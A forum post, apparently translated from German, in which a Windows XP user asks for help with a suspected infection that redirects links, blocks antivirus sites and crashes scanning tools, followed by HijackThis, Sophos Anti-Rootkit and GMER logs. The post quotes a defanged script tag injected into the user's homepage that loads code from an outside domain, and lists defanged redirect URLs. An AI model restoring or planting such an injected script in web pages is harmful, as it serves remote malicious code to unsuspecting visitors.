Links are being redirected, AV websites and programs no longer work, homepage hacked

Hello,

After a problem with XP and the system repair, Avira's automatic update stopped working. After a scan with Avira I deleted a few files, but that had no consequences. I then installed NOD32, but the update does not work there either. A scan with the outdated signatures found nothing. Windows Update still seems to work. In the process I noticed, however, that I can no longer open many antivirus websites, whether with Opera9 or IE7. I get incomprehensible error messages:

Quote:
Windows-Dateischutz konnte eine Überprüfung der Systemdateien nicht initialisieren. Der spezifische Fehlercode ist 0x000006ba [Der RPC-Server ist nicht verfügbar.].

In addition, links in Opera are being altered, especially on Google and eBay. They then lead to advertising pages or to pages such as

Code:
hxxp:// ///www.safe-monitoring.in/sx1/404.php
hxxp:// ///www.safe-monitoring-2.in/sx1/voli9x1.php?ID=20677&fb=....

HijackThis, with the evaluation on the website, showed nothing conclusive, only 2 question marks. Malwarebytes starts but disappears after a few seconds; OTH did not help. With Sophos Anti-Rootkit the GUI does not start, but I was able to run a scan from the console. Gmer worked at one point, but it sometimes shut the system down. Currently GMER causes a bluescreen. WinSCP drives the system to full load and then cannot be fully closed either (the process stays active).

The following code was placed on my homepage:

Code:
<script src=hxxp:/ /multiplemarketing.info/images/gifimg.php ></script>

Here are a few more logs, though they are already a few days old:

HiJackThis:

Code:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21:17:58, on 20.06.2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.21256)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Programme\Intel\Wireless\Bin\EvtEng.exe
C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe
C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe
C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Programme\Synaptics\SynTP\SynTPEnh.exe
C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE
C:\Programme\Panasonic\WSwitch\WSwitch.exe
C:\Programme\Nero\Nero 7\InCD\NBHGui.exe
C:\Programme\Nero\Nero 7\InCD\InCD.exe
C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe
C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe
C:\Programme\Sandboxie\SbieSvc.exe
C:\Programme\Sandboxie\SbieCtrl.exe
C:\Programme\Sandboxie\SandboxieRpcSs.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Programme\Trend Micro\HiJackThis\HiJackThis.exe
C:\Programme\Opera\opera.exe
C:\WINDOWS\system32\NOTEPAD.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SynTPLpr] C:\Programme\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Programme\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [IntelZeroConfig] "C:\Programme\Intel\Wireless\bin\ZCfgSvc.exe"
O4 - HKLM\..\Run: [IntelWireless] "C:\Programme\Intel\Wireless\Bin\ifrmewrk.exe" /tf Intel PROSet/Wireless
O4 - HKLM\..\Run: [Hotkey] C:\WINDOWS\system32\hkeyman.exe
O4 - HKLM\..\Run: [Panasonic Hotkey Manager] C:\Programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE
O4 - HKLM\..\Run: [WSwitch] C:\Programme\Panasonic\WSwitch\WSwitch.exe
O4 - HKLM\..\Run: [PCinfo] C:\Programme\Panasonic\PCINFO\SetDiag.exe /FirstLogin
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [SecurDisc] C:\Programme\Nero\Nero 7\InCD\NBHGui.exe
O4 - HKLM\..\Run: [InCD] C:\Programme\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [VirtualCloneDrive] "C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" /s
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [egui] "C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SandboxieControl] "C:\Programme\Sandboxie\SbieCtrl.exe"
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-20\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-20\..\RunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32 (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [nltide_3] rundll32 advpack.dll,LaunchINFSectionEx nLite.inf,C,,4,N (User 'Default user')
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Programme\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1276015979588
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1276015904580
O17 - HKLM\System\CCS\Services\Tcpip\..\{D9AE09D2-9DAE-46C5-93FE-0DC1FCBB848E}: NameServer = 217.0.43.161 217.0.43.177
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: ESET HTTP Server (EhttpSrv) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: ESET Service (ekrn) - ESET - C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe
O23 - Service: NBService - Nero AG - C:\Programme\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: Sandboxie Service (SbieSvc) - tzuk - C:\Programme\Sandboxie\SbieSvc.exe

--
End of file - 8080 bytes

Sophos:

Code:
Sophos Anti-Rootkit Version 1.5.0 (c) 2009 Sophos Plc
Started logging on 19.06.2010 at 23:00:57
User "***" on computer "TOUGHBOOK"
Windows version 5.1 SP 3.0 Service Pack 3 build 2600 SM=0x100 PT=0x1 Win32
Info: Starting process scan.
Info: Starting registry scan.
Hidden: registry item \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\midi9
Info: Starting disk scan of C: (NTFS).
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,690398%2FVergleich-1980-zu-2009-Wie-schwer-und-teuer-ist-1-Petabyte-Datenspeicher%2FLaufwerk%2FNews%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,676309%2FUSB-30-Die-wichtigsten-Infos-zum-neuen-Technologie-Standard-Update%2FTechnologie%2FWissen%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,654197%2FDer-PCGH-Rivatuner-Guide-Teil-1-Einrichtung-und-Grundlagen%2FGrafikkarte%2FBildergalerie%2Ffavicon.ico
Hidden: file C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\profile\images\http%3A%2F%2Fwww.pcgameshardware.de%2Faid,678008%2FWestern-Digital-Caviar-Green-WD20EADS-2-Terabyte-Festplatte-im-Kurztest%2FLaufwerk%2FTest%2Ffavicon.ico
Info: Starting disk scan of D: (FAT).
Stopped logging on 19.06.2010 at 23:59:28

Gmer:
WS2_32.dll!send 71A14C27 5 Bytes JMP 10003264 .text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSARecv 71A14CB5 5 Bytes JMP 100027F8 .text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!recv 71A1676F 5 Bytes JMP 1000278C .text C:\WINDOWS\system32\taskmgr.exe[3192] WS2_32.dll!WSASend 71A168FA 5 Bytes JMP 10003A9C ---- Devices - GMER 1.0.15 ---- AttachedDevice \FileSystem\Ntfs \Ntfs eamon.sys (Amon monitor/ESET) AttachedDevice \FileSystem\Ntfs \Ntfs InCDrec.SYS (InCD File System Recognizer/Nero AG) AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.) AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 SynTP.sys (Synaptics Touchpad Driver/Synaptics, Inc.) AttachedDevice \Driver\Tcpip \Device\Tcp epfwtdir.sys (ESET Antivirus Network Redirector/ESET) AttachedDevice \FileSystem\Fastfat \Fat eamon.sys (Amon monitor/ESET) ---- EOF - GMER 1.0.15 ---- sejott |